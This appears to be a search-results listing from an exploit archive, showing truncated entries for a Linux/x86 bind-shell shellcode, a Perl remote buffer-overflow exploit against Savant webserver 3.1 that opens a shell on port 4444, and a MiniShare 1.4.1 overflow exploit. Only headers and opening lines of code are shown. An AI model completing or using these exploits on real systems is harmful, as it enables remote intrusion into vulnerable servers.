3 matches found
Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)
---------------------- DESCRIPTION ------------------------------------- ; Title: Linux/x86 bind tcp shellcode port 43690 null-free ; Author: Daniel Ortiz ; Tested on: Linux 4.18.0-25-generic 26 Ubuntu ; Size: 53 bytes ; SLAE ID: PA-9844 section .DATA section .BSS section .TEXT global start start...
savant-overflow.txt
!/usr/bin/perl -w exploit for Savant webserver 3.1 remote bof shellcode bind 4444 port on target host Jacopo cervini aka [email protected] use IO::Socket; if!$ARGV1 print "Uso: savant-3.1.pl \n\n"; exit; $victim = IO::Socket::INET-newProto='tcp', PeerAddr=$ARGV0, PeerPort=$ARGV1 or die "can't conne...
MiniShare <= 1.4.1 Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================= MiniShare ---- EXTRA ---- Update the JMP ESP if you need. A wrong offset will crash minishare. Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6...